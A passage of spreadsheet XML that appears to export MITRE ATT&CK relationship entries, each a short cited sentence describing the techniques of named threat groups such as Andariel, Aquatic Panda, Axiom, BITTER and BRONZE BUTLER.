    <t>[Ajax Security Team](https://attack.mitre.org/groups/G0130) has used personalized spearphishing attachments.(Citation: Check Point Rocket Kitten)</t>
  </si>
  <si>
    <t>relationship--4b98c580-7907-487c-a5b1-202663762c47</t>
  </si>
  <si>
    <t>[Ajax Security Team](https://attack.mitre.org/groups/G0130) has used various social media channels to spearphish victims.(Citation: FireEye Operation Saffron Rose 2013)</t>
  </si>
  <si>
    <t>relationship--25424268-9ffb-40ed-8335-249deea323ca</t>
  </si>
  <si>
    <t>[Andariel](https://attack.mitre.org/groups/G0138) has collected large numbers of files from compromised network systems for later extraction.(Citation: FSI Andariel Campaign Rifle July 2017)</t>
  </si>
  <si>
    <t>relationship--343e78cb-dbe9-4421-aca3-a8a973553c7a</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</si>
  <si>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</si>
  <si>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relationship--4fd205f2-656f-4211-b60b-510d53dfa8d3</t>
  </si>
  <si>
    <t>[Andariel](https://attack.mitre.org/groups/G0138) has exploited numerous ActiveX vulnerabilities, including zero-days.(Citation: FSI Andariel Campaign Rifle July 2017)(Citation: IssueMakersLab Andariel GoldenAxe May 2017)(Citation: TrendMicro New Andariel Tactics July 2018)</t>
  </si>
  <si>
    <t>relationship--2f5d9a23-5360-479c-b6dc-f9827bb6b353</t>
  </si>
  <si>
    <t>[Andariel](https://attack.mitre.org/groups/G0138) has limited its watering hole attacks to specific IP address ranges.(Citation: AhnLab Andariel Subgroup of Lazarus June 2018)</t>
  </si>
  <si>
    <t>relationship--4ee087c3-92d0-4886-bc90-167e7ab8926d</t>
  </si>
  <si>
    <t>[Andariel](https://attack.mitre.org/groups/G0138) has downloaded additional tools and malware onto compromised hosts.(Citation: AhnLab Andariel Subgroup of Lazarus June 2018)</t>
  </si>
  <si>
    <t>relationship--ef8385b2-e62c-4854-9a0b-f23d6de334cd</t>
  </si>
  <si>
    <t>[Andariel](https://attack.mitre.org/groups/G0138) has attempted to lure victims into enabling malicious macros within email attachments.(Citation: AhnLab Andariel Subgroup of Lazarus June 2018)</t>
  </si>
  <si>
    <t>relationship--c4de34ea-99de-4850-817d-f9f2915bc7bd</t>
  </si>
  <si>
    <t>[Andariel](https://attack.mitre.org/groups/G0138) has used a variety of publicly-available remote access Trojans (RATs) for its operations.(Citation: FSI Andariel Campaign Rifle July 2017)</t>
  </si>
  <si>
    <t>relationship--aaeef068-5853-45c9-922a-9ff779041cbe</t>
  </si>
  <si>
    <t>[Andariel](https://attack.mitre.org/groups/G0138) has used &lt;code&gt;tasklist&lt;/code&gt; to enumerate processes and find a specific string.(Citation: Kaspersky Andariel Ransomware June 2021)</t>
  </si>
  <si>
    <t>relationship--63f08c72-9be6-45d5-9c60-2a4794795760</t>
  </si>
  <si>
    <t>[Andariel](https://attack.mitre.org/groups/G0138) has inserted a malicious script within compromised websites to collect potential victim information such as browser type, system language, Flash Player version, and other data.(Citation: TrendMicro New Andariel Tactics July 2018)</t>
  </si>
  <si>
    <t>relationship--9fc2e926-e5a9-4c56-8d7c-cdef9dd7f7ab</t>
  </si>
  <si>
    <t>[Andariel](https://attack.mitre.org/groups/G0138) has conducted spearphishing campaigns that included malicious Word or Excel attachments.(Citation: AhnLab Andariel Subgroup of Lazarus June 2018)(Citation: MalwareBytes Lazarus-Andariel Conceals Code April 2021)</t>
  </si>
  <si>
    <t>relationship--c801e7ac-dce5-4349-bc07-446b5eec9744</t>
  </si>
  <si>
    <t>[Andariel](https://attack.mitre.org/groups/G0138) has hidden malicious executables within PNG files.(Citation: MalwareBytes Lazarus-Andariel Conceals Code April 2021)(Citation: Kaspersky Andariel Ransomware June 2021)</t>
  </si>
  <si>
    <t>relationship--da7dcfcb-7a36-43a8-8a0a-409d15b7e62e</t>
  </si>
  <si>
    <t>[Andariel](https://attack.mitre.org/groups/G0138) has used the &lt;code&gt;netstat -naop tcp&lt;/code&gt; command to display TCP connections on a victim's machine.(Citation: Kaspersky Andariel Ransomware June 2021)</t>
  </si>
  <si>
    <t>relationship--2bb829ce-e597-4033-af7c-ef44aaebadb4</t>
  </si>
  <si>
    <t>[Aoqin Dragon](https://attack.mitre.org/groups/G1007) has exploited CVE-2012-0158 and CVE-2010-3333 for execution against targeted systems.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--b0601ad4-5d8d-4c86-8d0a-86fc2edadbc3</t>
  </si>
  <si>
    <t>[Aoqin Dragon](https://attack.mitre.org/groups/G1007) has run scripts to identify file formats including Microsoft Word.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--767ce5fe-06f5-4efc-aa41-129fad867c65</t>
  </si>
  <si>
    <t>[Aoqin Dragon](https://attack.mitre.org/groups/G1007) has spread malware in target networks by copying modules to folders masquerading as removable devices.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--287c3024-f58d-4fab-87a7-54d4b52f5a5c</t>
  </si>
  <si>
    <t>[Aoqin Dragon](https://attack.mitre.org/groups/G1007) has lured victims into opening weaponized documents, fake external drives, and fake antivirus to execute malicious payloads.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--1c306018-7f22-4080-81c5-939bd0bd81be</t>
  </si>
  <si>
    <t>[Aoqin Dragon](https://attack.mitre.org/groups/G1007) has used custom malware, including [Mongall](https://attack.mitre.org/software/S1026) and [Heyoka Backdoor](https://attack.mitre.org/software/S1027), in their operations.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--65656d55-1f2f-43f9-b29f-084b9024841c</t>
  </si>
  <si>
    <t>[Aoqin Dragon](https://attack.mitre.org/groups/G1007) has used fake icons including antivirus and external drives to disguise malicious payloads.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--945ebd48-f638-469c-a106-113ab8bbf408</t>
  </si>
  <si>
    <t>[Aoqin Dragon](https://attack.mitre.org/groups/G1007) has used a dropper that employs a worm infection strategy using a removable device to breach a secure network environment.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--2f337593-16b2-40a2-928c-c7659d0326ea</t>
  </si>
  <si>
    <t>[Aoqin Dragon](https://attack.mitre.org/groups/G1007) has used the Themida packer to obfuscate malicious payloads.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--3f42c6bd-332d-40b0-9e5f-ead557d021c9</t>
  </si>
  <si>
    <t>[Aoqin Dragon](https://attack.mitre.org/groups/G1007) obtained the Heyoka open source exfiltration tool and subsequently modified it for their operations.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--a6ff725c-1c60-44dd-8f78-22f1b009bbb5</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has used WinRAR to compress memory dumps prior to exfiltration.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>relationship--e0d8b438-c7be-43b3-ba3f-9dd61c0e54cb</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has encoded PowerShell commands in Base64.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>relationship--010ee4a6-41cb-4ce5-8dc2-9a1d1003ec4e</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has used DLL search-order hijacking to load `exe`, `dll`, and `dat` files into memory.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>relationship--38230234-1111-41cf-aa6b-b107577dad61</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has attempted to stop endpoint detection and response (EDR) tools on compromised systems.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>relationship--97aea4a9-1016-40d0-8869-9b4c4d4eec72</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has deleted malicious executables from compromised machines.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>relationship--02bd0dd0-85cb-439c-a984-973bed485f8e</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has downloaded additional malware onto compromised hosts.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>relationship--52ed39dd-0f4c-4e30-8b3b-7eb75b5c87e3</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has attempted to harvest credentials through LSASS memory dumping.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>relationship--c417561d-d3fa-4aa7-b272-6769b2ada225</t>
  </si>
  <si>
    <t>20 January 2022</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has acquired and used [njRAT](https://attack.mitre.org/software/S0385) in its operations.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>relationship--82697b12-31e0-4a9f-a394-d5555b0da05f</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has downloaded additional scripts and executed Base64 encoded commands in PowerShell.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>relationship--f57dc789-e35e-4336-8935-9e1b7eca0324</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has attempted to discover third party endpoint detection and response (EDR) tools on compromised systems.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>relationship--833c9993-3551-45af-9bbd-413de2d4dac3</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has used native OS commands to understand privilege levels and system details.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>relationship--cf629c11-56bd-4804-a03a-311689060c85</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has attempted to discover services for third party EDR products.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>relationship--6ba11730-a404-4252-aefe-acbf71877b0c</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has acquired and used [Cobalt Strike](https://attack.mitre.org/software/S0154) in its operations.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>relationship--9e2b7623-69e9-4c03-a4da-df281e99f663</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has used publicly accessible DNS logging services to identify servers vulnerable to Log4j (CVE 2021-44228).(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>relationship--bcd8dfe5-6f81-406c-a06a-7aa83db91a5e</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has attempted and failed to run Bash commands on a Windows host by passing them to &lt;code&gt;cmd /C&lt;/code&gt;.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>relationship--8ca9a16d-d54d-415c-b048-96be71a52966</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) actors have been known to use the Sticky Keys replacement within RDP sessions to obtain persistence.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--b9f4c6ef-d0bd-4651-9445-4705e1fd85f2</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has compressed and encrypted data prior to exfiltration.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--2202d670-a6f3-42eb-ae1b-1ae615c3b620</t>
  </si>
  <si>
    <t>07 January 2022</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has used large groups of compromised machines for use as proxy nodes.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--324a715b-5d89-41a1-957e-3214badee119</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has acquired dynamic DNS services for use in the targeting of intended victims.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--7a51cf35-ac6e-4954-8864-8aa48a4bebbf</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has collected data from a compromised network.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--161c58eb-29d7-4de3-aca8-3bda085f19a3</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has used watering hole attacks to gain access.(Citation: Cisco Group 72)</t>
  </si>
  <si>
    <t>relationship--37880f36-c47a-4d1f-aedf-bb7d9fb2fd9f</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has been observed using SQL injection to gain access to systems.(Citation: Novetta-Axiom)(Citation: Cisco Group 72)</t>
  </si>
  <si>
    <t>relationship--e11a3d87-d9cf-4dcf-b722-fef4b0a324b4</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has used exploits for multiple vulnerabilities including CVE-2014-0322, CVE-2012-4792, CVE-2012-1889, and CVE-2013-3893.(Citation: Cisco Group 72)</t>
  </si>
  <si>
    <t>relationship--7ab16f65-9be6-46ec-8c2c-96f58e089df0</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has been known to dump credentials.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--fad2a504-6e00-4892-bf88-b49d6d18788c</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has used spear phishing to initially compromise victims.(Citation: Cisco Group 72)(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--d738cc0a-6d6f-41d9-88d0-9fe83bacad55</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has targeted victims with remote administration tools including RDP.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--a78310c3-ee57-465a-9983-13c6a7cd1d4f</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has used RDP during operations.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--70f3eaca-179d-4412-ad32-c4e3cf60c27c</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has used steganography to hide its C2 communications.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--0c393451-a750-4c8a-81be-4d0e9e84a6eb</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has used digital certificates to deliver malware.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--64aa92d9-abdb-494c-8646-8548aa7c25a5</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has used previously compromised administrative accounts to escalate privileges.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--8a83df94-30d3-4d4b-94c0-d988e3fcfc33</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) has used VPS hosting providers in targeting of intended victims.(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--a12a296d-3cdb-4a49-840a-4ecd073b5312</t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has registered a variety of domains to host malicious payloads and for C2.(Citation: Forcepoint BITTER Pakistan Oct 2016)</t>
  </si>
  <si>
    <t>relationship--d5e5a57a-e8cd-43c8-bc69-fa8bd40d82c0</t>
  </si>
  <si>
    <t xml:space="preserve">[BITTER](https://attack.mitre.org/groups/G1002) has executed OLE objects using Microsoft Equation Editor to download and run malicious payloads.(Citation: Cisco Talos Bitter Bangladesh May 2022) </t>
  </si>
  <si>
    <t>relationship--b0994eea-4c0c-42d3-8d68-0acb1b6bb592</t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has used DDNS for C2 communications.(Citation: Forcepoint BITTER Pakistan Oct 2016)</t>
  </si>
  <si>
    <t>relationship--24fadb92-7a18-450b-b4ca-f5dd019ce54c</t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has encrypted their C2 communications.(Citation: Forcepoint BITTER Pakistan Oct 2016)</t>
  </si>
  <si>
    <t>relationship--79192884-411c-490d-a28e-f923be7070e3</t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has exploited Microsoft Office vulnerabilities CVE-2012-0158, CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)</t>
  </si>
  <si>
    <t>relationship--d497a340-9b38-4b98-8fb6-1288519dc541</t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has exploited CVE-2021-1732 for privilege escalation.(Citation: DBAPPSecurity BITTER zero-day Feb 2021)(Citation: Microsoft CVE-2021-1732 Feb 2021)</t>
  </si>
  <si>
    <t>relationship--81399eeb-a9f0-4e55-baed-2be3829962fe</t>
  </si>
  <si>
    <t xml:space="preserve">[BITTER](https://attack.mitre.org/groups/G1002) has downloaded additional malware and tools onto a compromised host.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016) </t>
  </si>
  <si>
    <t>relationship--03c86a72-8298-4558-afc7-19cc09da4ff5</t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has attempted to lure victims into opening malicious attachments delivered via spearphishing.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)</t>
  </si>
  <si>
    <t>relationship--445c926e-e0fb-4ac1-ba70-4ed45a68c592</t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has disguised malware as a Windows Security update service.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>relationship--842c8968-1dab-46f9-838d-cb29d748fe5a</t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has used TCP for C2 communications.(Citation: Forcepoint BITTER Pakistan Oct 2016)</t>
  </si>
  <si>
    <t>relationship--e7f27ed5-a90a-49c0-bd81-a10a98f77574</t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has used a RAR SFX dropper to deliver malware.(Citation: Forcepoint BITTER Pakistan Oct 2016)</t>
  </si>
  <si>
    <t>relationship--4bb228b7-a456-426a-9be0-68a8a8a1b2d0</t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has used scheduled tasks for persistence and execution.(Citation: Cisco Talos Bitter Bangladesh May 2022)</t>
  </si>
  <si>
    <t>relationship--e6997505-11ce-4ac3-ba26-b14f943b8a99</t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has sent spearphishing emails with a malicious RTF document or Excel spreadsheet.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)</t>
  </si>
  <si>
    <t>relationship--3efa9831-8d67-4bd1-92d4-ef252747b701</t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has obtained tools such as PuTTY for use in their operations.(Citation: Forcepoint BITTER Pakistan Oct 2016)</t>
  </si>
  <si>
    <t>relationship--13b6f054-5771-43ef-84df-b05ec9001f23</t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has registered domains to stage payloads.(Citation: Forcepoint BITTER Pakistan Oct 2016)</t>
  </si>
  <si>
    <t>relationship--85c85045-a030-435c-a353-6d89a1feacc0</t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) has used HTTP POST requests for C2.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)</t>
  </si>
  <si>
    <t>relationship--0fc4c1db-001c-4b17-82c9-c55319a26534</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has compressed data into password-protected RAR archives prior to exfiltration.(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--99e9583f-433d-437d-bf37-7ea2b3f1b613</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used [at](https://attack.mitre.org/software/S0110) to register a scheduled task to execute malware during lateral movement.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--9ef58dda-688d-4461-b5fc-25f2ba3a9c54</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</si>
  <si>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</si>
  <si>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relationship--cc13f316-0f88-4ed1-8790-b13bc35be119</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used a Windows 10 specific tool and xxmm to bypass UAC for privilege escalation.(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--4c6aea43-27ba-4e6a-8907-e5db364a145b</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used legitimate applications to side-load malicious DLLs.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--881b3ad2-38dd-45b0-b75b-49acf6f7c6a3</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has exfiltrated files stolen from local systems.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--05e9e12f-be5e-46f4-9f42-6f7fb7e9fb4a</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has exfiltrated files stolen from file shares.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--595be2e7-9f2a-4d5a-b23d-8e4822ae6199</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060)'s MSGET downloader uses a dead drop resolver to access malicious payloads.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--ab66ef8a-f496-48d2-a358-0e4f7b00d5c0</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) downloads encoded payloads and decodes them on the victim.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--03303147-db81-4cb3-9368-98ee4f963c1a</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has incorporated code into several tools that attempts to terminate anti-virus processes.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--8cb3eda9-3829-4bc0-aa72-704df128d92e</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used &lt;code&gt;net user /domain&lt;/code&gt; to identify account information.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--fa155ccc-b9db-48f6-bb1a-a367596668ad</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) compromised three Japanese websites using a Flash exploit to perform watering hole attacks.(Citation: Symantec Tick Apr 2016)</t>
  </si>
  <si>
    <t>relationship--731d14c6-a141-4e71-ac61-c344636e13d5</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has exploited Microsoft Office vulnerabilities CVE-2014-4114, CVE-2018-0802, and CVE-2018-0798 for execution.(Citation: Symantec Tick Apr 2016)(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--935f9bb6-d38d-42d1-a764-6b5110ad5364</t>
  </si>
  <si>
    <t>The [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) uploader or malware the uploader uses &lt;code&gt;command&lt;/code&gt; to delete the RAR archives after they have been exfiltrated.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--089efdf8-b07a-4cda-aa5d-e60f9501ffd1</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has collected a list of files from the victim and uploaded it to its C2 server, and then created a new list of specific files to steal.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--fc4dd2b6-63a0-46fe-bfc4-90e58e5d1422</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used various tools to download files, including DGet (a similar tool to wget).(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--d7c5e4f4-cede-4a81-b46f-035b9e702e61</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used various tools (such as Mimikatz and WCE) to perform credential dumping.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--8f897f1c-7bc6-4a85-8d3b-627f976af215</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has attempted to get users to launch malicious Microsoft Word attachments delivered via spearphishing emails.(Citation: Symantec Tick Apr 2016)(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--c87a8320-8705-4de3-93ee-2db5c00ea461</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has masked executables with document file icons including Word and Adobe PDF.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--2f2432b0-d985-41d8-bc47-e4aa1dbf8372</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has given malware the same name as an existing file on the file share server to cause users to unwittingly launch and install the malware on additional systems.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--2174c465-8855-4c92-a683-97eb0eba9f7c</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has created forged Kerberos Ticket Granting Ticket (TGT) and Ticket Granting Service (TGS) tickets to maintain administrative access.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--eb91c7d8-2cfb-4d8b-905a-d146bc8178e2</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used PowerShell for execution.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--d36e83a0-5370-4d78-862d-4dbe8921709d</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has made use of Python-based remote access tools.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--138fb337-c378-43a3-bacb-54f40696fb6b</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used a batch script that adds a Registry Run key to establish malware persistence.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--d20b659b-3595-4171-9beb-668ab26bf398</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) typically use &lt;code&gt;ping&lt;/code&gt; and [Net](https://attack.mitre.org/software/S0039) to enumerate systems.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--95805281-96b1-49ea-95ee-9d654178c5c3</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used Right-to-Left Override to deceive victims into executing several strains of malware.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--ff6fd36b-bc49-4df7-86f0-62b9d1fc9754</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used [schtasks](https://attack.mitre.org/software/S0111) to register a scheduled task to execute malware during lateral movement.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--ba7f4c8e-860a-45fc-a9e7-bb7d0ec96a2c</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used a tool to capture screenshots.(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--2d840d1b-28d7-4387-86fd-6d3df8650171</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used tools to enumerate software installed on an infected host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--54e0e380-aef8-4c63-9792-ebda05affee6</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) used spearphishing emails with malicious Microsoft Word attachments to infect victims.(Citation: Symantec Tick Apr 2016)(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--1ad674bb-c8e1-4f19-b96e-f56bfa10797c</t>
  </si>
  <si>
    <t>Several [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) tools encode data with base64 when posting it to a C2 server.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--545a618f-9fe4-4573-a0a0-ecfcef0b407c</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used steganography in multiple operations to conceal malicious payloads.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>relationship--f5777849-9cea-4e02-93ba-9065b27f0e58</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</si>
  <si>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</si>
  <si>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relationship--ec4d07a2-8c8b-4df8-bb9e-b8c3e23d8dc5</t>
  </si>
  <si>
